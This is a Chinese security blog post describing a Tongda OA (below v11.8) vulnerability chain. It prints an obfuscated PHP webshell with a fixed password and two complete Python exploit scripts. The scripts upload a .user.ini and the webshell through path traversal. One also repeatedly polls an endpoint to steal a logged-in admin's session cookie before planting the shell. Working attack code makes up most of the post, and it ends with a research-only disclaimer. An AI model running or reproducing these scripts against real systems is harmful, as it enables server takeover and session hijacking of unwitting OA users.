一:漏洞描述🐑
前一篇文章简单介绍了利用方法,但 v11.7 与 v11.8 Webshell命令无法执行
昨天收到了来自 Russell师傅的建议,上传蚁剑可连接的Webshell控制服务器
并可以配合之前的通达OA v11.7 的任意在线用户Cookie泄露来进一步渗透
二: 漏洞影响🐇
通达0A V11.8以下
三: 漏洞复现🐋
蚁剑的webshell为
<?phpecho "PeiQi_Wiki";$fOgT=create_function(base64_decode('JA==').chr(114195/993).str_rot13('b').str_rot13('z').chr(708-607),chr(0xc60e/0x1f6).base64_decode('dg==').str_rot13('n').chr(390-282).chr(0x1ae-0x186).chr(0x3ac-0x388).chr(0xd561/0x1db).base64_decode('bw==').base64_decode('bQ==').base64_decode('ZQ==').str_rot13(')').chr(798-739));$fOgT(base64_decode('OTM2N'.'DM3O0'.'BldkF'.'sKCRf'.''.str_rot13('H').str_rot13('R').chr(41382/726).str_rot13('G').base64_decode('Vg==').''.''.base64_decode('Rg==').str_rot13('g').str_rot13('D').base64_decode('Wg==').chr(23751/273).''.'lRaV0'.'pOzI4'.'MDkzM'.'TE7'.''));?>
上传 .user.ini 再上传 peiqi.log 后访问 URL 出现 PeiQi_Wiki 就是成功上传了
http://192.168.1.103/general/reportshop/workshop/report/attachment-remark/form.inc.php?
使用蚁剑连接 密码为 PeiQi (Url访问无需登录,可直接远程连接)
这里重新写了一个EXP,为蚁剑Webshell上传EXP(文末获取)
配合 之前的通达OA v11.7以下的在线用户Cookie泄露
一旦用户登录OA系统时就主动上传Webshell
四: 漏洞POC🦉
https://github.com/PeiQi0/PeiQi-WIKI-POC目前POC已经全部上传到Github
蚁剑后台文件上传
import requestsimport sysimport randomimport reimport base64from requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+ �33[34mPOC_Des: http://wiki.peiqi.tech �33[0m')print('+ �33[34mVersion: 通达OA < V11.8 �33[0m')print('+ �33[36m使用格式: python3 poc.py �33[0m')print('+ �33[36mUrl >>> http://xxx.xxx.xxx.xxx �33[0m')print('+ �33[36mCookie >>> xxxxxxxxxxxxxxxxxxxxxx �33[0m')print('+------------------------------------------')def POC_1(target_url, Cookie):vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshopworkshop/report/attachment-remark/.user"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104","Connection": "close","Cookie": Cookie,"Upgrade-Insecure-Requests": "1",}data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0icGVpcWkuaW5pIgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW4KCmF1dG9fcHJlcGVuZF9maWxlPXBlaXFpLmxvZwotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3VibWl0IgoK5o+Q5LqkCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTc1MTgzMjM5ODY1NDg5OTI5NTE5ODQwNTcxMDQtLQ==")try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)print("�33[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user �33[0m".format(target_url))if "档案已保存" in response.text and response.status_code == 200:print("�33[32m[o] 目标 {} 成功上传.user.ini文件, �33[0m".format(target_url))POC_2(target_url, Cookie)else:print("�33[31m[x] 目标 {} 上传.user.ini文件失败�33[0m".format(target_url))sys.exit(0)except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)def POC_2(target_url, Cookie):vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshopworkshop/report/attachment-remark/peiqi"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104","Connection": "close","Cookie": Cookie,"Upgrade-Insecure-Requests": "1",}data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0icGVpcWkubG9nIgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW4KCjw/cGhwIAplY2hvICJQZWlRaV9XaWtpIjsKJGZPZ1Q9Y3JlYXRlX2Z1bmN0aW9uKGJhc2U2NF9kZWNvZGUoJ0pBPT0nKS5jaHIoMTE0MTk1Lzk5Mykuc3RyX3JvdDEzKCdiJykuc3RyX3JvdDEzKCd6JykuY2hyKDcwOC02MDcpLGNocigweGM2MGUvMHgxZjYpLmJhc2U2NF9kZWNvZGUoJ2RnPT0nKS5zdHJfcm90MTMoJ24nKS5jaHIoMzkwLTI4MikuY2hyKDB4MWFlLTB4MTg2KS5jaHIoMHgzYWMtMHgzODgpLmNocigweGQ1NjEvMHgxZGIpLmJhc2U2NF9kZWNvZGUoJ2J3PT0nKS5iYXNlNjRfZGVjb2RlKCdiUT09JykuYmFzZTY0X2RlY29kZSgnWlE9PScpLnN0cl9yb3QxMygnKScpLmNocig3OTgtNzM5KSk7JGZPZ1QoYmFzZTY0X2RlY29kZSgnT1RNMk4nLidETTNPMCcuJ0JsZGtGJy4nc0tDUmYnLicnLnN0cl9yb3QxMygnSCcpLnN0cl9yb3QxMygnUicpLmNocig0MTM4Mi83MjYpLnN0cl9yb3QxMygnRycpLmJhc2U2NF9kZWNvZGUoJ1ZnPT0nKS4nJy4nJy5iYXNlNjRfZGVjb2RlKCdSZz09Jykuc3RyX3JvdDEzKCdnJykuc3RyX3JvdDEzKCdEJykuYmFzZTY0X2RlY29kZSgnV2c9PScpLmNocigyMzc1MS8yNzMpLicnLidsUmFWMCcuJ3BPekk0Jy4nTURrek0nLidURTcnLicnKSk7Pz4KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InN1Ym1pdCIKCuaPkOS6pAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0LS0K")try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)print("�33[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/peiqi �33[0m".format(target_url))if "档案已保存" in response.text and response.status_code == 200:print("�33[32m[o] 目标 {} 成功上传 peiqi.log 文件, �33[0m".format(target_url))POC_3(target_url, Cookie)else:print("�33[31m[x] 目标 {} 上传 peiqi.log 文件失败�33[0m".format(target_url))sys.exit(0)except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)def POC_3(target_url, Cookie):vuln_url = target_url + "/general/reportshop/workshop/report/attachment-remark/form.inc.php?"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Cookie": Cookie,}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)print("�33[36m[o] 正在请求 {}/general/reportshop/workshop/report/attachment-remark/form.inc.php? �33[0m".format(target_url))if "PeiQi_Wiki" in response.text and response.status_code == 200:print("�33[32m[o] 目标 {} 存在漏洞,响应中包含 PeiQi_Wiki �33[0m".format(target_url))print("�33[32m[o] 成功上传蚁剑木马 密码为: PeiQi n[o] webshell路径: {}/general/reportshop/workshop/report/attachment-remark/form.inc.php?�33[0m".format(target_url))else:print("�33[31m[x] 目标 {} 不存在漏洞,响应中不包含 PeiQi_Wiki�33[0m".format(target_url))sys.exit(0)except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)if __name__ == '__main__':title()target_url = str(input("�33[35mPlease input Attack UrlnUrl >>> �33[0m"))Cookie = "PHPSESSID=ug4ip8ohugo61bmu399npplep5; USER_NAME_COOKIE=admin; OA_USER_ID=admin"POC_1(target_url, Cookie)
登录Cookie泄露配合后台文件上传
import requestsimport sysimport randomimport reimport base64import timefrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+ �33[34mPOC_Des: http://wiki.peiqi.tech �33[0m')print('+ �33[34mVersion: 通达OA 11.7 �33[0m')print('+ �33[36m使用格式: python3 poc.py �33[0m')print('+ �33[36mUrl >>> http://xxx.xxx.xxx.xxx �33[0m')print('+------------------------------------------')def POC_0(target_url):vuln_url = target_url + "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)if "RELOGIN" in response.text and response.status_code == 200:print("�33[31m[x] 目标用户为下线状态 --- {}�33[0m".format(time.asctime( time.localtime(time.time()))))elif response.status_code == 200 and response.text == "":Cookie = re.findall(r'PHPSESSID=(.*?);', str(response.headers))print("�33[32m[o] 用户上线 PHPSESSION: {} --- {}�33[0m".format(Cookie[0] ,time.asctime(time.localtime(time.time()))))Cookie = "PHPSESSID={};USER_NAME_COOKIE=admin; OA_USER_ID=admin".format(Cookie[0])POC_1(target_url, Cookie)else:print("�33[31m[x] 请求失败,目标可能不存在漏洞")sys.exit(0)except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)def POC_1(target_url, Cookie):vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshopworkshop/report/attachment-remark/.user"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104","Connection": "close","Cookie": Cookie,"Upgrade-Insecure-Requests": "1",}data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0icGVpcWkuaW5pIgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW4KCmF1dG9fcHJlcGVuZF9maWxlPXBlaXFpLmxvZwotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3VibWl0IgoK5o+Q5LqkCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTc1MTgzMjM5ODY1NDg5OTI5NTE5ODQwNTcxMDQtLQ==")try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)print("�33[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user �33[0m".format(target_url))if "档案已保存" in response.text and response.status_code == 200:print("�33[32m[o] 目标 {} 成功上传.user.ini文件, �33[0m".format(target_url))POC_2(target_url, Cookie)else:print("�33[31m[x] 目标 {} 上传.user.ini文件失败�33[0m".format(target_url))sys.exit(0)except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)def POC_2(target_url, Cookie):vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshopworkshop/report/attachment-remark/peiqi"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104","Connection": "close","Cookie": Cookie,"Upgrade-Insecure-Requests": "1",}data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0icGVpcWkubG9nIgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW4KCjw/cGhwIAplY2hvICJQZWlRaV9XaWtpIjsKJGZPZ1Q9Y3JlYXRlX2Z1bmN0aW9uKGJhc2U2NF9kZWNvZGUoJ0pBPT0nKS5jaHIoMTE0MTk1Lzk5Mykuc3RyX3JvdDEzKCdiJykuc3RyX3JvdDEzKCd6JykuY2hyKDcwOC02MDcpLGNocigweGM2MGUvMHgxZjYpLmJhc2U2NF9kZWNvZGUoJ2RnPT0nKS5zdHJfcm90MTMoJ24nKS5jaHIoMzkwLTI4MikuY2hyKDB4MWFlLTB4MTg2KS5jaHIoMHgzYWMtMHgzODgpLmNocigweGQ1NjEvMHgxZGIpLmJhc2U2NF9kZWNvZGUoJ2J3PT0nKS5iYXNlNjRfZGVjb2RlKCdiUT09JykuYmFzZTY0X2RlY29kZSgnWlE9PScpLnN0cl9yb3QxMygnKScpLmNocig3OTgtNzM5KSk7JGZPZ1QoYmFzZTY0X2RlY29kZSgnT1RNMk4nLidETTNPMCcuJ0JsZGtGJy4nc0tDUmYnLicnLnN0cl9yb3QxMygnSCcpLnN0cl9yb3QxMygnUicpLmNocig0MTM4Mi83MjYpLnN0cl9yb3QxMygnRycpLmJhc2U2NF9kZWNvZGUoJ1ZnPT0nKS4nJy4nJy5iYXNlNjRfZGVjb2RlKCdSZz09Jykuc3RyX3JvdDEzKCdnJykuc3RyX3JvdDEzKCdEJykuYmFzZTY0X2RlY29kZSgnV2c9PScpLmNocigyMzc1MS8yNzMpLicnLidsUmFWMCcuJ3BPekk0Jy4nTURrek0nLidURTcnLicnKSk7Pz4KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InN1Ym1pdCIKCuaPkOS6pAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0LS0K")try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)print("�33[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/peiqi �33[0m".format(target_url))if "档案已保存" in response.text and response.status_code == 200:print("�33[32m[o] 目标 {} 成功上传 peiqi.log 文件, �33[0m".format(target_url))POC_3(target_url, Cookie)else:print("�33[31m[x] 目标 {} 上传 peiqi.log 文件失败�33[0m".format(target_url))sys.exit(0)except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)def POC_3(target_url, Cookie):vuln_url = target_url + "/general/reportshop/workshop/report/attachment-remark/form.inc.php?"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Cookie": Cookie,}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)print("�33[36m[o] 正在请求 {}/general/reportshop/workshop/report/attachment-remark/form.inc.php? �33[0m".format(target_url))if "PeiQi_Wiki" in response.text and response.status_code == 200:print("�33[32m[o] 目标 {} 存在漏洞,响应中包含 PeiQi_Wiki �33[0m".format(target_url))print("�33[32m[o] 成功上传蚁剑木马 密码为: PeiQi n[o] webshell路径: {}/general/reportshop/workshop/report/attachment-remark/form.inc.php?�33[0m".format(target_url))sys.exit(0)else:print("�33[31m[x] 目标 {} 不存在漏洞,响应中不包含 PeiQi_Wiki�33[0m".format(target_url))sys.exit(0)except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)if __name__ == '__main__':title()target_url = str(input("�33[35mPlease input Attack UrlnUrl >>> �33[0m"))while True:POC_0(target_url)time.sleep(5)
最后
下面就是文库和团队的公众号啦,更新的文章都会在第一时间推送在公众号
别忘了Github下载完给个小星星⭐
本文始发于微信公众号(PeiQi文库):(补充)通达OA v11.8 存储型XSS 与 命令执行
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论